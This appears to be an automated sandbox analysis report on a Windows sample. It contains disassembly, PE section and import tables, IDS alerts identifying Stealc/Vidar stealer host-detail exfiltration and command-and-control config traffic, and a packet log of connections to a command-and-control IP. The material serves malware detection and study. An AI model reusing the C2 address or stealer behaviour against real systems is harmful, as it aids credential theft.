                                                                                                                                                                                                                                                                                    call dword ptr [004219D4h]
                                                                                                                                                                                                                                                                                    mov dword ptr [006351C4h], eax
                                                                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                                                                    je 00007F4CE8DB26A4h
                                                                                                                                                                                                                                                                                    push 00420101h
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9ECA2h
                                                                                                                                                                                                                                                                                    mov dword ptr [00634F6Ch], eax
                                                                                                                                                                                                                                                                                    push 00420CB1h
                                                                                                                                                                                                                                                                                    push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9EC8Dh
                                                                                                                                                                                                                                                                                    mov dword ptr [00634F68h], eax
                                                                                                                                                                                                                                                                                    push 00420D79h
                                                                                                                                                                                                                                                                                    push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9EC78h
                                                                                                                                                                                                                                                                                    mov dword ptr [00634F70h], eax
                                                                                                                                                                                                                                                                                    push 00420D50h
                                                                                                                                                                                                                                                                                    push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9EC63h
                                                                                                                                                                                                                                                                                    mov dword ptr [00634FD8h], eax
                                                                                                                                                                                                                                                                                    push 00420D5Bh
                                                                                                                                                                                                                                                                                    push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9EC4Eh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x21728 | 0xc8 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x237000 | 0x149c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1fbd8 | 0x5c | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x21988 | 0x198 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1dd78 | 0x1de00 | 0ce5587661d15577632e53c8a6001885 | False | 0.5060800209205021 | data | 6.454457697482663 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x1f000 | 0x31cc | 0x3200 | fd29d8756d3862857221531ababec3de | False | 0.491328125 | DOS executable (block device driver) | 5.681327123118545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x23000 | 0x2121e0 | 0x1600 | bc81a9497a63b536266387a4e7cae584 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg | 0x236000 | 0x4 | 0x200 | 07ada419974a1f82db6bdd49d543272b | False | 0.03125 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x237000 | 0x149c | 0x1600 | 087859e7d46786662434790d6717c7ba | False | 0.7935014204545454 | data | 6.591187625006626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | CloseHandle, CreateDirectoryA, CreateFileA, CreateThread, ExitProcess, ExpandEnvironmentStringsA, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetCurrentProcess, GetDriveTypeA, GetFileInformationByHandle, GetFileSize, GetLastError, GetLocalTime, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleHandleA, GetProcessHeap, GetTickCount, HeapAlloc, HeapFree, OpenProcess, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, Sleep, SystemTimeToFileTime, VirtualAlloc, VirtualAllocExNuma, VirtualFree, VirtualQueryEx, WaitForSingleObject, WriteFile, lstrcatA, lstrcmpiW, lstrcpyA, lstrlenA
msvcrt.dll | ??2@YAPAXI@Z, ??3@YAXPAX@Z, ??_U@YAPAXI@Z, ??_V@YAXPAX@Z, _itoa_s, _splitpath, atexit, free, isupper, malloc, memchr, memcmp, memcpy, memmove, memset, rand, srand, strchr, strcmp, strcpy, strcpy_s, strlen, strncpy, strstr, strtok_s
USER32.dll | CharToOemA, CloseDesktop, CreateDesktopA, GetDesktopWindow, OpenDesktopA, wsprintfA, wsprintfW
api-ms-win-crt-runtime-l1-1-0.dll | _invalid_parameter_noinfo_noreturn
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsnprintf_s
ADVAPI32.dll | GetCurrentHwProfileA, GetUserNameA, RegGetValueA, RegOpenKeyExA
SHELL32.dll | SHFileOperationA, SHGetFolderPathA
WS2_32.dll | WSACleanup, WSAStartup, closesocket, connect, freeaddrinfo, getaddrinfo, htons, recv, send, socket
SHLWAPI.dll | PathFileExistsA
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T06:57:22.889027+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.5 | 49706 | 94.130.188.57 | 443 | TCP
2024-12-23T06:57:27.806148+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.5 | 49708 | 94.130.188.57 | 443 | TCP
2024-12-23T06:57:27.806392+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 94.130.188.57 | 443 | 192.168.2.5 | 49708 | TCP
2024-12-23T06:57:30.110607+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 94.130.188.57 | 443 | 192.168.2.5 | 49709 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490505934 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490530014 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490551949 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490571022 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490602016 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490647078 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490928888 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490946054 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.503712893 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.503827095 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.503988981 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.504370928 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.504407883 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.911860943 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.911979914 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.912674904 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.912691116 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.915257931 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.915266991 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806175947 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806205988 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806286097 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806322098 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806355000 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806957006 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806979895 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.817378998 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.817421913 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.817816019 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.818145990 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.818156958 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.217394114 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.217660904 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.218377113 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.218386889 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.220679045 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.220686913 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110373974 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110476971 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110488892 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110537052 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110897064 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110918045 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141505957 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141549110 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141625881 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141911030 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141921997 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136457920 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136506081 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136683941 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136827946 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136835098 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.543982029 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.544063091 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.544907093 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.544925928 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.546861887 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.546871901 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.546932936 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.546951056 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.522208929 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.522281885 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.522331953 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.522418976 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.523273945 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.523338079 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.535396099 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.535456896 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.536303043 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.536310911 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.571188927 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.571197987 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.589756966 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.589842081 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.589926004 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.589926004 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.796689987 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.796719074 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.969917059 CET49713443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.969957113 CET44349713142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.778825998 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.778887987 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.778914928 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.791294098 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.791353941 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.791363955 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.804862976 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.804936886 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.804985046 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.818686962 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.818744898 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.818768978 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.828989029 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.829133034 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.829190969 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.842350960 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.842420101 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.842483044 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.855359077 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.855446100 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.855504036 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.868623972 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.868684053 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.868700027 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.910670042 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.923724890 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.925955057 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.926127911 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.926141024 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.932425976 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.932486057 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.932554007 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.932569981 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.932632923 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.937227011 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.946347952 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.946391106 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.946433067 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.946463108 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.946845055 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.957833052 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.969537973 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.969603062 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.969615936 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.980266094 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.980305910 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.980326891 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.980340958 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.980600119 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:36.991120100 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.000900030 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.000956059 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.000967979 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.010530949 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.010576010 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.010602951 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.010618925 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.010740995 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.020123959 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.029728889 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.029772997 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.029814005 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.029829979 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.029900074 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.039273024 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.048847914 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.048887014 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.048935890 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.048981905 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.049036980 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.058054924 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.067369938 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.067421913 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.067430973 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.067456007 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.067512989 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.076250076 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.077554941 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.077613115 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.077651978 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:37.086103916 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:41.829875946 CET49749443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:41.829890013 CET4434974994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:41.829895973 CET49749443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:41.829899073 CET4434974994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:42.500765085 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:42.500874996 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:42.500974894 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:42.504165888 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:42.504194975 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.812911987 CET4434974994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.812980890 CET49749443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.812999964 CET4434974994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.813057899 CET49749443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.813970089 CET49749443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.813997984 CET4434974994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.903888941 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.904158115 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.904778957 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.904793024 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.914689064 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.914732933 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.914915085 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.914940119 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.915107965 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.915133953 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.915219069 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:43.915234089 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:44.536039114 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:44.536088943 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:44.536706924 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:44.537091970 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:44.537106037 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.378082037 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.378150940 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.378160000 CET4434975694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.378209114 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.379226923 CET49756443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.379250050 CET4434975694.130.188.57192.168.2.5
